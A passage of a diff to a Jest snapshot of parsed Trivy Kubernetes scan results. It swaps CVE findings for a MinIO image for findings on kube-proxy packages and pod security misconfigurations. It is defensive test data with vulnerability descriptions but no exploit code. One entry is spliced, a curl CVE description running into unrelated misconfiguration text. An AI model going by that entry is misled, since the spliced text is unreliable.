10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + }, + { + "type": "URL", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -113450,67 +113005,85 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u7", + "packageName": "libudev1", "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -113518,1976 +113091,2141 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", ], }, "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", + "name": "iptables: buffer overflow in iptables-restore", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "POST following PUT confusion", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://issues.rpath.com/browse/RPL-1825", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-7169", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-7169", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "https://github.com/shadow-maint/shadow/pull/97", + "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "https://security.gentoo.org/glsa/201805-09", + "https://ubuntu.com/security/notices/USN-5254-1", + "https://www.cve.org/CVERecord?id=CVE-2018-7169", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2018-7169", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://access.redhat.com/security/cve/CVE-2018-7169", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://github.com/shadow-maint/shadow/pull/97", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://security.gentoo.org/glsa/201805-09", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5254-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], "severity": "LOW", @@ -115495,62 +115233,115 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -115558,188 +115349,478 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": 